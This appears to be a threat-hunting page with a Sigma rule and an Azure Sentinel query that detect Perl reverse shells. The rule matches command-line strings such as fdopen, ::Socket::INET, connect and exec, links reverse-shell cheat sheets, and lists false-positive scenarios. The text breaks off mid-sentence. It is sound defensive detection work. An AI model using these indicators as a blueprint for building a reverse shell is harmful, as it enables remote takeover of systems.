Adversaries may use Perl to establish a reverse shell, leveraging its execution capabilities to maintain persistence and exfiltrate data. SOC teams should proactively hunt for this behavior in Azure Sentinel to identify and mitigate potential command and control activities early.
Detection Rule
title: Potential Perl Reverse Shell Execution
id: 259df6bc-003f-4306-9f54-4ff1a08fa38e
status: test
description: Detects execution of the perl binary with the "-e" flag and common strings related to potential reverse shell activity
references:
- https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
- https://www.revshells.com/
author: '@d4ns4n_, Nasreddine Bencherchali (Nextron Systems)'
date: 2023-04-07
tags:
- attack.execution
logsource:
category: process_creation
product: linux
detection:
selection_img:
Image|endswith: '/perl'
CommandLine|contains: ' -e '
selection_content:
- CommandLine|contains|all:
- 'fdopen('
- '::Socket::INET'
- CommandLine|contains|all:
- 'Socket'
- 'connect'
- 'open'
- 'exec'
condition: all of selection_*
falsepositives:
- Unlikely
level: high
imProcessCreate
| where (TargetProcessName endswith "/perl" and TargetProcessCommandLine contains " -e ") and ((TargetProcessCommandLine contains "fdopen(" and TargetProcessCommandLine contains "::Socket::INET") or (TargetProcessCommandLine contains "Socket" and TargetProcessCommandLine contains "connect" and TargetProcessCommandLine contains "open" and TargetProcessCommandLine contains "exec"))Scenario: Scheduled Perl Script for System Monitoring
Description: A legitimate scheduled job runs a Perl script to monitor system performance or log files.
Filter/Exclusion: Exclude processes with command_line containing /usr/bin/perl and script_name like monitor_system.pl or log_parser.pl.
Scenario: Admin Task to Generate Reports Using Perl
Description: An administrator uses Perl to generate reports from database queries or CSV files.
Filter/Exclusion: Exclude processes where the command_line includes --report or --output flags and the script is located in a known admin tools directory (e.g., /opt/admin_tools/).
Scenario: Perl-Based Automation Tool Execution
Description: A known automation tool (e.g., Net::SSH or DBI) is used to perform routine tasks like database backups or configuration syncs.
Filter/Exclusion: Exclude processes where the command_line includes known automation tool names or paths like /usr/local/bin/net_ssh.pl or /opt/dbi_utils/backup.pl.
Scenario: Perl Script for Log Parsing in SIEM Integration
Description: A Perl script is used to parse and forward logs to a SIEM system (e.g., Splunk, ELK).
Filter/Exclusion: Exclude processes where the command_line includes --siem or --forward and the script is located in a log processing directory (e.g., /var/log_processing/).
Scenario: Perl Script for User Account Management
Description: A Perl script is used to automate user account creation or modification via LDAP or Active Directory.
Filter/Exclusion: Exclude processes where the command_line includes --user or --ldap and the script is located in a user management